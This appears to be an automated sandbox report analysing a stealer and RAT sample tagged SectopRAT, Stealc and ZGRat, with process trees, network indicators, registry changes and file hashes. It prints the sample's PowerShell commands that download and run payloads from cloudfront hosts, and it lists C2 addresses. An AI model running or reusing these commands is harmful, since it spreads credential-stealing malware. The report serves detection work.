Malware Analysis Report

2024-12-08 01:39

Sample ID 240428-bqme8adb9y
Target 6781c522f3390cc4947959d168e61bbc.bin
SHA256 03ec55805a5f2294793d116bc75c7da56e7a791a20e198125beb7a5a52a16744
Tags
sectoprat stealc zgrat discovery rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03ec55805a5f2294793d116bc75c7da56e7a791a20e198125beb7a5a52a16744

Threat Level: Known bad

The file 6781c522f3390cc4947959d168e61bbc.bin was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat discovery rat spyware stealer trojan

ZGRat

Detect ZGRat V1

SectopRAT payload

SectopRAT

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Reads data files stored by FTP clients

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-28 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win10v2004-20240419-en

Max time kernel

67s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsf3AB8.tmp\load.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsf3AB8.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win7-20240419-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win10v2004-20240419-en

Max time kernel

66s

Max time network

55s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4104 -ip 4104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 g.bing.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win7-20240220-en

Max time kernel

138s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1544 set thread context of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 set thread context of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ugs.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\ugs.0.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data omitted in this copy of the report] C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data omitted in this copy of the report] C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [blob data omitted in this copy of the report] C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = [blob data omitted in this copy of the report] C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1
335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 604 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.3.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1608 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\ugs.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2672 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\ugs.0.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.0.exe"

C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\ugs.3.exe

"C:\Users\Admin\AppData\Local\Temp\ugs.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
IT 108.156.0.203:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.62:80 185.172.128.62 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:80 download.iolo.net tcp
FR 143.244.56.51:443 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar9F9.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e21bca6840e5d0fab2459f8100e5ec8
SHA1 6d6744f6074f1ddfb12b2393c612eb840e226e12
SHA256 806b74106cc0904a36a8ecbeb96dcbf35098fcbb7637bc7d84872549bfb08423
SHA512 cfd6abf8455eb1bb56eda91b290845fd6af72f233f2a40188487ad0c39024e3491a8747f8112c571d140ae3bba2306ac78c5a21eda4c85d279f73b22aaad5435

C:\Users\Admin\AppData\Local\Temp\nsi6C5.tmp\load.bat

MD5 75599c4a0c50b789c306880785ffa782
SHA1 31bb898b645b5616b2adf0a4718a9f24ce28e1c1
